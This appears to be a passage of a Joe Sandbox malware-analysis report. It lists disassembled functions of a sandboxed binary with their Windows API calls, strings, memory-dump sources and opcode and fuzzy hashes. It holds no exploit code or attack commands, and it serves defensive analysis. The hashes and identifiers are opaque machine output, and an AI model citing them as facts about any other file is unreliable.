                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                                                                                                                                                                  • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                                                                                                                                                                  • API String ID: 2573145106-3235461205
                                                                                                                                                                                                                                  • Opcode ID: 0165f3f1031fc1aa6e60b3a9799ba1014783226e14f241c311df118ccfede771
                                                                                                                                                                                                                                  • Instruction ID: 2f0632834368beac7d1c7250186d6a5b4d0e74160b608b18ba1b2b0c741dc3d5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0165f3f1031fc1aa6e60b3a9799ba1014783226e14f241c311df118ccfede771
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8101A231600204AFD710EBA98C02A5A73A8EB49B25F51407BFC10E73D3DE399E08965D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042E9AC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                                                                                                                                                                  • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                                                                                                                                                                  • API String ID: 3478007392-2498399450
                                                                                                                                                                                                                                  • Opcode ID: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                                                                                                                                                                  • Instruction ID: c922fa4e85abb1c6873f36dcd01b6443d81c66d6c3501223796626af46e79b09
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5CE0ECB2740324EADA103B627E8AF663558E724B19F50043BF001751F1C7FD1C80CA9E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00477B94 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderthreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                                                                                                                                                                  • String ID: AllowSetForegroundWindow$user32.dll
                                                                                                                                                                                                                                  • API String ID: 1782028327-3855017861
                                                                                                                                                                                                                                  • Opcode ID: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                                                                                                                                                                  • Instruction ID: d51ed2a8d8be4cb67b0f2e6afaff03014389f5b4c9f6752a27b175deb1fe6994
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7D0C790248701B9D910B3F64D46E9F3A5D894471CB50C47BB418E61C5DA7CFD04893D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00416C2C Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • BeginPaint.USER32(00000000,?), ref: 00416C52
                                                                                                                                                                                                                                  • SaveDC.GDI32(?), ref: 00416C83
                                                                                                                                                                                                                                  • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D45), ref: 00416CE4
                                                                                                                                                                                                                                  • RestoreDC.GDI32(?,?), ref: 00416D0B
                                                                                                                                                                                                                                  • EndPaint.USER32(00000000,?,00416D4C,00000000,00416D45), ref: 00416D3F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3808407030-0
                                                                                                                                                                                                                                  • Opcode ID: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                                                                                                                                                                  • Instruction ID: 8164e3b37c2b38cc39b91ef4074089abf19b8963c3e0e5cbd12a4ce3d65b1abe
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1415070A002049FCB14DBA9C585FAA77F9FF48304F1540AEE8459B362D778DD81CB58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00414800 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                                                                                                                                                                  • Instruction ID: a833d86c80f2fb81cba799e3b93fc1891ddf3ebdd98a67124a25423b7ab76754
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 563132746057809FC320EF69C984B9BB7E8AF89354F04491EF9D5C3752C638E8818F19
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004297CC Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429808
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429837
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429853
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042987E
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042989C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3850602802-0
                                                                                                                                                                                                                                  • Opcode ID: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                                                                                                                                                                  • Instruction ID: 8b65b0e689063cc909dba6714575951256d1ad54ff8cece17fd29570ea6901c2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E219D707107057BEB10AB62DC82F5B7AECAB41708F54443EB501AB2D2DFB8AE418228
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041BBB8 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000B), ref: 0041BBCA
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000000C), ref: 0041BBD4
                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 0041BC12
                                                                                                                                                                                                                                  • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC59
                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0041BC9A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MetricsSystem$BitmapCreateDeleteObject
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1095203571-0
                                                                                                                                                                                                                                  • Opcode ID: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                                                                                                                                                                  • Instruction ID: 2a907a32995036c4e239f44386a828d3a2f1e7d44945ead90e55d18394f4d4ff
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D315C70E00208EFDB04DFA5C941AAEB7F5EB48700F2084AAF514AB781D7789E40DB98
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004735D8 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 71COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0045D04C: SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 00473665
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 0047367B
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Setting permissions on registry key: %s\%s, xrefs: 0047362A
                                                                                                                                                                                                                                  • Could not set permissions on the registry key because it currently does not exist., xrefs: 0047366F
                                                                                                                                                                                                                                  • Failed to set permissions on registry key (%d)., xrefs: 0047368C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                  • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                                                                                                                                                                  • API String ID: 1452528299-4018462623
                                                                                                                                                                                                                                  • Opcode ID: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                                                                                                                                                                  • Instruction ID: ad6b00cc897a6d1501f3fc6a2a631de3da5dc8c6e7b4eccdfad28332e4495c63
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A121C870A046445FCB10DFA9C8826EEBBE4DF49319F50817BE408E7392D7785E098B6D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00403CA4 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                                                                                                                                                  • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                                                                                                                                                                  • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocString
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 262959230-0
                                                                                                                                                                                                                                  • Opcode ID: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                                                                                                                                                                  • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004143E0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414419
                                                                                                                                                                                                                                  • RealizePalette.GDI32(00000000), ref: 00414421
                                                                                                                                                                                                                                  • SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414435
                                                                                                                                                                                                                                  • RealizePalette.GDI32(00000000), ref: 0041443B
                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00414446
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Palette$RealizeSelect$Release
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2261976640-0
                                                                                                                                                                                                                                  • Opcode ID: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                                                                                                                                                                  • Instruction ID: 3cc421e061c7a323c9855e33cbe13bf4890882f9e8533d15179bd5f7679f66d2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2018F7520C3806AE600A63D8C85A9F6BED9FCA718F15446EF495DB282DA7AC8018765
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00424CE0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041F074: GetActiveWindow.USER32 ref: 0041F077
                                                                                                                                                                                                                                    • Part of subcall function 0041F074: GetCurrentThreadId.KERNEL32 ref: 0041F08C
                                                                                                                                                                                                                                    • Part of subcall function 0041F074: EnumThreadWindows.USER32(00000000,Function_0001F050), ref: 0041F092
                                                                                                                                                                                                                                    • Part of subcall function 004231A8: GetSystemMetrics.USER32(00000000), ref: 004231AA
                                                                                                                                                                                                                                  • OffsetRect.USER32(?,?,?), ref: 00424DC9
                                                                                                                                                                                                                                  • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E8C
                                                                                                                                                                                                                                  • OffsetRect.USER32(?,?,?), ref: 00424E9D
                                                                                                                                                                                                                                    • Part of subcall function 00423564: GetCurrentThreadId.KERNEL32 ref: 00423579
                                                                                                                                                                                                                                    • Part of subcall function 00423564: SetWindowsHookExA.USER32(00000003,00423520,00000000,00000000), ref: 00423589
                                                                                                                                                                                                                                    • Part of subcall function 00423564: CreateThread.KERNEL32(00000000,000003E8,004234D0,00000000,00000000), ref: 004235AD
                                                                                                                                                                                                                                    • Part of subcall function 00424B2C: SetTimer.USER32(00000000,00000001,?,004234B4), ref: 00424B47
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Thread$CurrentOffsetRectWindows$ActiveCreateDrawEnumHookMetricsSystemTextTimerWindow
                                                                                                                                                                                                                                  • String ID: vLB
                                                                                                                                                                                                                                  • API String ID: 1477829881-1797516613
                                                                                                                                                                                                                                  • Opcode ID: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                                                                                                                                                                  • Instruction ID: 1a85cd152e58b5c2614c87f396891e2b5808bef0cf689969089b0637ec596c27
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5812675A003188FCB14DFA8D880ADEBBF4FF88314F50416AE905AB296E738AD45CF44
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00406FA4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156shareCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407003
                                                                                                                                                                                                                                  • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040707D
                                                                                                                                                                                                                                  • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070D5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
